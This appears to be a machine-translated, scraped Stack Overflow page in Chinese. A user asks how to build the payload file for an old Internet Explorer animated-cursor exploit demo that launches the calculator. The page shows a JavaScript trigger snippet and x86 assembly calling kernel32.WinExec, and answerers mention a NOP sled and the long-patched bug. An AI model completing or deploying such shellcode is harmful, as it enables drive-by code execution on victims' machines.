Javascript 如何设置此十六进制程序集?

Javascript 如何设置此十六进制程序集?,javascript,assembly,memory,Javascript,Assembly,Memory,我将在课堂上做一个关于钓鱼的报告。我在网上发现了一个非常有趣的演示 在InternetExplorer8上,它应该是WorkWin7 它应该打开计算器 riff.htm中需要一个x86汇编十六进制代码,但是他没有显示riff.htm,所以:我应该如何创建riff.htm 谢谢你的帮助 index.htm: <script language="javascript"> document.write("<html><body style=\"cursor: url('r

我将在课堂上做一个关于钓鱼的报告。我在网上发现了一个非常有趣的演示

在InternetExplorer8上,它应该是WorkWin7

它应该打开计算器

riff.htm中需要一个x86汇编十六进制代码,但是他没有显示riff.htm,所以:我应该如何创建riff.htm

谢谢你的帮助

index.htm:

<script language="javascript">
document.write("<html><body style=\"cursor: url('riff.htm');\">   </body></html>");
wait(500);
window.location.reload();
</script>
在x86组件中,它必须类似:

MOV EBP,ESP
PUSH 20202020
PUSH 636d6163
LEA EAX,DWORD PTR SS:[EBP-8]
PUSH EAX
MOV EAX,kernel32.WinExec
CALL EAX
在InternetExplorer8上,它应该是WorkWin7

您描述的漏洞听起来像。此漏洞在Windows 7发布前几年已修补-Windows 7系统从未受到影响


在任何情况下,都不清楚这与网络钓鱼的演示有何关系。

重复0x90块是一个NOP sled,又称NOP slide,只要在该地址范围内的任何位置开始执行,它就仍然有效。除此之外,我不清楚你在问什么。你的问题没有包括足够的细节,关于你到底想创造什么。不,我不会去看几段youtube视频来了解背景;这取决于你如何让你的问题解释得足够有用,并且能够自己回答,这就是堆栈溢出的工作原理。对不起。编辑了这个问题。听起来riff.htm只是你的漏洞外壳代码/有效载荷,应该是二进制机器。所以hex将这个hex解压回二进制。
MOV EBP,ESP
PUSH 20202020
PUSH 636d6163
LEA EAX,DWORD PTR SS:[EBP-8]
PUSH EAX
MOV EAX,kernel32.WinExec
CALL EAX